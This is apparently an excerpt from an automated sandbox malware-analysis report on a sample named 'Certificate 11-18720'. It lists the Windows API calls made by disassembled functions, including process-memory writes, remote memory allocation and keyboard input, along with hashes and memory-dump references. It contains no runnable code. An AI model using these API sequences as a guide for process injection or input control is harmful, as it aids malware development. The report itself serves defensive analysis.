                                                                                    • CoCreateInstance.OLE32(0064DA7C,00000000,00000001,0064D8EC,?), ref: 0060F2F2
                                                                                    • CoUninitialize.OLE32 ref: 0060F555
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 948891078-24824748
                                                                                    • Opcode ID: 020af1a66e5e69d3ac1d896e66718f6b591745c10b59cbee83ab24241e79ee14
                                                                                    • Instruction ID: b0e1b1e3556752b8caaddd496b0e32a679f744859471ffffcad7c918b2982aa5
                                                                                    • Opcode Fuzzy Hash: 020af1a66e5e69d3ac1d896e66718f6b591745c10b59cbee83ab24241e79ee14
                                                                                    • Instruction Fuzzy Hash: B1A12B71104202AFD300EFA4C895EABBBADFFD8714F00495EF55597292EB70EA49CB52
                                                                                    APIs
                                                                                      • Part of subcall function 005C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C53B1,?,?,005C61FF,?,00000000,00000001,00000000), ref: 005C662F
                                                                                    • CoInitialize.OLE32(00000000), ref: 0060E85D
                                                                                    • CoCreateInstance.OLE32(0064DA7C,00000000,00000001,0064D8EC,?), ref: 0060E876
                                                                                    • CoUninitialize.OLE32 ref: 0060E893
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2126378814-24824748
                                                                                    • Opcode ID: 6bfc49a058fad0db0077aa7d1c81c27ab5adf1e3461f8a8b4e13449867366f2a
                                                                                    • Instruction ID: 26c66c23b0ebd20fc0d83c8a7bb4eb7fcba715782ef0af59d5cd7a8dcecca86f
                                                                                    • Opcode Fuzzy Hash: 6bfc49a058fad0db0077aa7d1c81c27ab5adf1e3461f8a8b4e13449867366f2a
                                                                                    • Instruction Fuzzy Hash: ACA145356043129FCB14DF54C488E6ABBE6BF89710F04895DF99A9B3A1CB32EC45CB91
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 005E32ED
                                                                                      • Part of subcall function 005EE0D0: __87except.LIBCMT ref: 005EE10B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__87except__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 2905807303-2276729525
                                                                                    • Opcode ID: 9a85d7331c06f287917bff7ef0ad214d1486b038b88bbbae119f4a4fc0927657
                                                                                    • Instruction ID: 6b1ddcc068445dba6bc31e2b42743ae6998e1414186b2f65e0cfad2fb2e32291
                                                                                    • Opcode Fuzzy Hash: 9a85d7331c06f287917bff7ef0ad214d1486b038b88bbbae119f4a4fc0927657
                                                                                    • Instruction Fuzzy Hash: 59516D75A183C396CB1DBB16C90A77A2F95BB81710F209D68F4D5832E9EF348DC8D642
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0065DC50,?,0000000F,0000000C,00000016,0065DC50,?), ref: 00604645
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 006046C5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                                                    • String ID: REMOVE$THIS
                                                                                    • API String ID: 3797816924-776492005
                                                                                    • Opcode ID: 5483d22b69683050e7114d31c1225ea194d4eaf9e5819d96ef769c58b51bf058
                                                                                    • Instruction ID: 5fb022ac2f1d52f9e986dff1c30b9adacbf05332f2ca21c84ad5551a85d80ed5
                                                                                    • Opcode Fuzzy Hash: 5483d22b69683050e7114d31c1225ea194d4eaf9e5819d96ef769c58b51bf058
                                                                                    • Instruction Fuzzy Hash: 1B41A574A4011A9FCF14DF94C845AAEBBB6FF85304F148459EA16AB3A2DF34DD41CB50
                                                                                    APIs
                                                                                      • Part of subcall function 0060430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005FBC08,?,?,00000034,00000800,?,00000034), ref: 00604335
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005FC1D3
                                                                                      • Part of subcall function 006042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005FBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00604300
                                                                                      • Part of subcall function 0060422F: GetWindowThreadProcessId.USER32(?,?), ref: 0060425A
                                                                                      • Part of subcall function 0060422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 0060426A
                                                                                      • Part of subcall function 0060422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00604280
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005FC240
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005FC28D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: b1a03f1853d564242eade6d01e2b51fd014248ca4146666fee2ae4c402c4f125
                                                                                    • Instruction ID: 56de45ae93d61f34726d6e2b2a0577a9795e1b013dfa15bcdacf41f1ad57d75e
                                                                                    • Opcode Fuzzy Hash: b1a03f1853d564242eade6d01e2b51fd014248ca4146666fee2ae4c402c4f125
                                                                                    • Instruction Fuzzy Hash: 18413B76A0021CBEDB14EBA4CD81AEEBB79FF09700F004099FA45B7181DA756E45CB61
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0065DC00,00000000,?,?,?,?), ref: 0062A6D8
                                                                                    • GetWindowLongW.USER32 ref: 0062A6F5
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0062A705
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: cd7436b18badc8f184512256ca404f7c9e9b437ba12d6e3aceb2d07c78dd4d40
                                                                                    • Instruction ID: a2f336323c7252967954b238a152a4cf904180735bba0772c77289213cd790cb
                                                                                    • Opcode Fuzzy Hash: cd7436b18badc8f184512256ca404f7c9e9b437ba12d6e3aceb2d07c78dd4d40
                                                                                    • Instruction Fuzzy Hash: 40310135200A16AFDB218FB8DC44BEA7BAAFB49324F244325F875932E0D770E850CB54
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00615190
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006151C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_memset
                                                                                    • String ID: |$Da
                                                                                    • API String ID: 1413715105-2787809871
                                                                                    • Opcode ID: 7413713ded34248493a81068f475e768174299298c0516c52e1615ff30e0e678
                                                                                    • Instruction ID: 36b3079f7252e062be258901fa2c1de6fe1e8709d99f752a42ab37df76d06f85
                                                                                    • Opcode Fuzzy Hash: 7413713ded34248493a81068f475e768174299298c0516c52e1615ff30e0e678
                                                                                    • Instruction Fuzzy Hash: 6E31197580011AAFCF11EFE4CC45EEEBFB9FF54700F140059E919A6165DA31AA46DB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0062A15E
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0062A172
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0062A196
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: 5fb18d5aa731773f3cd5d3bca8b1b2ca7a1ecf24dd0168453c15f99644be0cb9
                                                                                    • Instruction ID: 84b0627a1b9dbf6baf4a9b36e9a28ff741e3a36a2745f5eb783bd28cb8415eb5
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0062A941
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0062A94F
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0062A956
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: cb99b94f42c965480f9431715e8e9cc1b5036f367d0b1fb1060367b1d673a12e
                                                                                    • Instruction ID: 7703ace40a7d59e44af5b55d6c64c6d3698c4f9ab71564bd22f9e6b0df1b951d
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00629A30
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00629A40
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00629A65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: 49c75a781e074bcc16b7f54e658ec1acc934d5acac4deb8c032ea2fd12f5841a
                                                                                    • Instruction ID: f93fa7e1cc939448be55608d9b06164cd70ff0b11ff7f93b72f3906ff522192f
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0062A46D
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0062A482
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0062A48F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: 12fbc6529f0bb79cf0c770140a2e8dd3395c891d1aea4d6c85463ad0eadadde0
                                                                                    • Instruction ID: 23bfcd701dcc43b5fe8aa1918615895ac2e0a92041009a1d8b82ce17aa5ee84b
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,005E2350,?), ref: 005E22A1
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 005E22A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RoInitialize$combase.dll
                                                                                    • API String ID: 2574300362-340411864
                                                                                    • Opcode ID: a8e8bd7769d2550dffcc5c0a1879c20171374d31c448e2393f24cb56ea902441
                                                                                    • Instruction ID: 6580102da4df2d144243c8bb68c021e3043839727176876f70043b54e27250c4
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005E2276), ref: 005E2376
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 005E237D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                    • API String ID: 2574300362-2819208100
                                                                                    • Opcode ID: 7aee48f112bfea3f99e7adf130d2ad498ee50f62124b2269d15d2a5a37cd7b46
                                                                                    • Instruction ID: b7e713e2903e95d11ef1d546cdde2d1eb7c9566108af611483ac5e262736f570
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime__swprintf
                                                                                    • String ID: %.3d$WIN_XPe
                                                                                    • API String ID: 2070861257-2409531811
                                                                                    • Opcode ID: 113d0406f1bc4dfa3d795a91f52cdde0a030f492d7259a395ca9e3351e2148c6
                                                                                    • Instruction ID: b482bec4efab85b272d4568f93c144daf961f0d52794d85a252f8db0258dd273
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,006221FB,?,006223EF), ref: 00622213
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00622225
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetProcessId$kernel32.dll
                                                                                    • API String ID: 2574300362-399901964
                                                                                    • Opcode ID: 72660962c69f6651cbadc82381cf924a761f743d5b884c0a982724059aab89c7
                                                                                    • Instruction ID: 89a921ef7777fca4a94e39a979c69148ddc29963d2b0f8ca24ef755080715a41
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,005C42EC,?,005C42AA,?), ref: 005C4304
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005C4316
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-1355242751
                                                                                    • Opcode ID: ba68fffe7b5772950c31d2259dc1a5262be0756ad2edee473db550cb771150dc
                                                                                    • Instruction ID: f40566f681c7618f258647c5ce3e54058e8e125bf884af542b1111a2bfe306b2
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,005C41BB,005C4341,?,005C422F,?,005C41BB,?,?,?,?,005C39FE,?,00000001), ref: 005C4359
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005C436B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-3689287502
                                                                                    • Opcode ID: aa1e4b943f208bafac4c0428582039f910332c1fef0270d5eb63c2834c919568
                                                                                    • Instruction ID: 966091016cc0baa242dbfb9acee9bb3c6f76e1702c6a121247bddb3762788f2b
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0060052F,?,006006D7), ref: 00600572
                                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00600584
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                    • API String ID: 2574300362-1587604923
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0060051D,?,006005FE), ref: 00600547
                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00600559
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                    • API String ID: 2574300362-1071820185
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0061ECBE,?,0061EBBB), ref: 0061ECD6
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0061ECE8
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 2574300362-1816364905
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0061BAD3,00000001,0061B6EE,?,0065DC00), ref: 0061BAEB
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0061BAFD
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 2574300362-199464113
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00623BD1,?,00623E06), ref: 00623BE9
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00623BFB
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2574300362-4033151799
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0061AAB4
                                                                                    • CoUninitialize.OLE32 ref: 0061AABF
                                                                                      • Part of subcall function 00600213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0060027B
                                                                                    • VariantInit.OLEAUT32(?), ref: 0061AACA
                                                                                    • VariantClear.OLEAUT32(?), ref: 0061AD9D
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 780911581-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                    • String ID:
                                                                                    • API String ID: 2808897238-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 3877424927-0
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00F26B08,?), ref: 0062C544
                                                                                    • ScreenToClient.USER32(?,00000002), ref: 0062C574
                                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0062C5DA
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005FC462
                                                                                    • __itow.LIBCMT ref: 005FC49C
                                                                                      • Part of subcall function 005FC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 005FC753
                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 005FC505
                                                                                    • __itow.LIBCMT ref: 005FC55A
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 9945ae7ef482cf882d2ee93d3d58b8cab54bd1ac28ea3ef4a0968598a0e16f3c
                                                                                    • Instruction ID: d6e47ccab0e40f3f20b66271251e4d29e930a3b575a0425a453cbc6e829fe934
                                                                                    • Opcode Fuzzy Hash: 9945ae7ef482cf882d2ee93d3d58b8cab54bd1ac28ea3ef4a0968598a0e16f3c
                                                                                    • Instruction Fuzzy Hash: CA414E71A0060D6FDF15EB94C959FAE7FB9BB85700F000029F645A7181DB74AA458BA1
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00603966
                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00603982
                                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006039EF
                                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00603A4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
